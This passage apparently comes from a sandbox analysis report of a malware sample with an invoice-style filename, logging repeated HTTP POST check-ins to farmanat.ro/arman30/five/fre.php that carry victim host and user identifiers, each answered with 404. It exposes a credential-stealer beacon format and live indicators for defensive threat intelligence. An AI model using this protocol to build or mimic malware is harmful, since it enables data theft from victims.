Nov 25, 2021 10:51:30.148468018 CET	6868	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:51:29 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
393	192.168.11.20	50237	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:51:30.571082115 CET	6869	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:51:30.604705095 CET	6869	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:51:30.656665087 CET	6869	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:51:29 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
394	192.168.11.20	50238	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:51:31.087433100 CET	6870	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:51:31.121891022 CET	6870	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:51:31.172842026 CET	6871	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:51:30 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
395	192.168.11.20	50239	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:51:31.605421066 CET	6872	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:51:31.638880968 CET	6872	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:51:31.694789886 CET	6872	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:51:30 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
396	192.168.11.20	50240	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:51:32.121427059 CET	6873	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:51:32.155625105 CET	6873	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:51:32.205734968 CET	6873	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:51:31 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
397	192.168.11.20	50241	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:51:32.627207994 CET	6874	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:51:32.660856009 CET	6874	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:51:32.710422993 CET	6875	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:51:31 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
398	192.168.11.20	50242	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:51:33.085055113 CET	6875	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:51:33.118539095 CET	6876	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:51:33.170150995 CET	6876	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:51:32 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
399	192.168.11.20	50243	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:51:33.603281021 CET	6877	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:51:33.637440920 CET	6877	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:51:33.694824934 CET	6877	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:51:32 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.11.20	49823	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:48:02.549129009 CET	6304	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:48:02.583339930 CET	6305	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:48:02.669756889 CET	6305	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:48:01 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
40	192.168.11.20	49876	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:48:27.693461895 CET	6366	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:48:27.727015018 CET	6366	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:48:27.784121037 CET	6366	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:48:26 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
400	192.168.11.20	50244	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:51:34.090456963 CET	6878	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:51:34.124661922 CET	6878	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:51:34.177088976 CET	6879	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:51:33 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
401	192.168.11.20	50245	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:51:34.587918043 CET	6879	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:51:34.622495890 CET	6880	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:51:34.672346115 CET	6880	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:51:33 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
402	192.168.11.20	50246	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:51:35.114156961 CET	6881	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:51:35.148386955 CET	6881	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:51:35.200263977 CET	6881	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:51:34 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
403	192.168.11.20	50247	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:51:35.578963995 CET	6882	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:51:35.612226963 CET	6882	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:51:35.660902023 CET	6883	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:51:34 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
404	192.168.11.20	50248	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:51:36.082510948 CET	6883	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:51:36.116099119 CET	6884	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:51:36.165667057 CET	6884	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:51:35 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
405	192.168.11.20	50249	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:51:36.600595951 CET	6885	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:51:36.634820938 CET	6885	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:51:36.691555977 CET	6885	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:51:35 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
406	192.168.11.20	50250	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:51:37.097490072 CET	6886	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:51:37.131242990 CET	6886	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:51:37.189821959 CET	6887	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:51:36 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
407	192.168.11.20	50251	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:51:37.589318037 CET	6887	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:51:37.623034954 CET	6888	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:51:37.680969954 CET	6888	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:51:36 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
408	192.168.11.20	50252	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:51:38.094882011 CET	6889	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:51:38.128961086 CET	6889	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:51:38.205209970 CET	6889	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:51:37 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
409	192.168.11.20	50253	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:51:38.599425077 CET	6890	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:51:38.632685900 CET	6890	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:51:38.689625978 CET	6891	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:51:37 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
41	192.168.11.20	49877	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:48:28.273850918 CET	6367	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:48:28.308095932 CET	6367	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:48:28.358525038 CET	6368	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:48:27 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
410	192.168.11.20	50254	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
